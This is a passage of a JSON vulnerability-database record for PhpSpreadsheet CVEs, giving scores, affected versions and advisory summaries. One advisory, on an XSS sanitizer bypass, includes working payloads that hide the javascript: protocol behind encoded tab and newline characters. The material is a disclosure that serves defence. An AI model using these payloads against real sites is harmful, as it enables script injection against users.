{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VC
ID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56410","GHSA-wv23-996v-q229"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ghv1-bdy8-hygk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56427?format=json","vulnerability_id":"VCID-m982-r6d1-c3bd","summary":"PhpSpreadsheet allows bypass XSS sanitizer using the javascript protocol and special characters\n# Bypass XSS sanitizer using the javascript protocol and special characters\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0**: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description**: an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateRow`\n**Exploitation conditions**: a user viewing a specially generated Excel file\n**Mitigation**: additional sanitization of special characters in a string\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet.\n\nThe following code is written on the server, which translates the XLSX file into a HTML representation and displays it in the response.\n\n*Listing 6. 
Source code on the server*\n\n```\n<?php\n\nrequire __DIR__ . '/vendor/autoload.php';\n\n$inputFileName = './doc/Book1.xlsx';\n$spreadsheet = \\PhpOffice\\PhpSpreadsheet\\IOFactory::load($inputFileName);\n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet);\nprint($writer->generateHTMLAll());\n```\n\nAn attacker can use special characters so that this library processes the javascript protocol with special characters and generates a HTML link.\nThe Excel file is unpacked and a hyperlink in the file is inserted into the `xl/worksheets/sheet1.xml` file.\n\n![fig11](https://github.com/user-attachments/assets/b9d53f7a-6f36-4853-95f9-8aa22f81eccd)\n\n*Figure 11. Using the javascript protocol with special characters*\n\nSome payloads help bypass the security system and carry out a XSS attack.\n\n*Listing 7. HTML form that demonstrates the exploitation of the XSS vulnerability*\n\n```\njav&#x09;ascript:alert()\njav&#x0D;ascript:alert()\njav&#x0A;ascript:alert()\n```\n\nIt's clear that the javascript protocol with special characters is used. \n\n![fig12](https://github.com/user-attachments/assets/7595e88b-9848-4251-845c-2c2d8032e479)\n\n*Figure 12. Using the javascript protocol with special characters*\n\nDue to the special characters, the execution stream ends up on line 1543, and the link is built in HTML form with the javascript protocol.\n\n<img width=\"373\" alt=\"fig13\" src=\"https://github.com/user-attachments/assets/3ca0c3c6-daa9-4502-ad9e-b803f308fd26\" />\n\n*Figure 13. 
Executing arbitrary JavaScript code*\n\n# Credit\nThis vulnerability was discovered by **Aleksey Solovev (Positive Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56412","reference_id":"","reference_type":"","scores":[{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54513","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54492","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54523","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56412"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T17:35:30Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56412","reference_id":"CVE-2024-56412","reference_type":"","scores":[{"value":"5.4","scoring_system":"c
vssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56412"},{"reference_url":"https://github.com/advisories/GHSA-q9jv-mm3r-j47r","reference_id":"GHSA-q9jv-mm3r-j47r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q9jv-mm3r-j47r"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q9jv-mm3r-j47r","reference_id":"GHSA-q9jv-mm3r-j47r","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T17:35:30Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q9jv-mm3r-j47r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.2
9.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56412","GHSA-q9jv-mm3r-j47r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VC
ID-m982-r6d1-c3bd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56425?format=json","vulnerability_id":"VCID-qayz-3ufe-77ba","summary":"PhpSpreadsheet allows unauthorized Reflected XSS in Currency.php file\n# Unauthorized Reflected XSS in `Currency.php` file\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` script, an attacker can perform XSS-type attack\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` file\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the `currency` variable\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in `Currency.php` file) in Phpspreadsheet.\n\nThere is no sanitization in the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` file, which leads to the possibility of a XSS attack.\nStrings are formed using the `currency` parameter without sanitization, controlled by an attacker.\n\n![fig9](https://github.com/user-attachments/assets/dfac3fbf-de42-42af-8163-b76f0c54da6c)\n\n*Figure 9.  A fragment of the query in which a string and a parameter are formed without sanitization*\n\nAn attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.\n\n*Listing 5. 
HTML form that demonstrates the exploitation of the XSS vulnerability*","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56409","reference_id":"","reference_type":"","scores":[{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76142","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76148","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76123","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76135","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76143","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56409"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:14:44Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4"},{"refe
rence_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56409","reference_id":"CVE-2024-56409","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56409"},{"reference_url":"https://github.com/advisories/GHSA-j2xg-cjcx-4677","reference_id":"GHSA-j2xg-cjcx-4677","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j2xg-cjcx-4677"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-j2xg-cjcx-4677","reference_id":"GHSA-j2xg-cjcx-4677","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:14:44Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-j2xg-cjcx-4677"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}
,{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56409","GHSA-j2xg-cjcx
-4677"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qayz-3ufe-77ba"}],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"}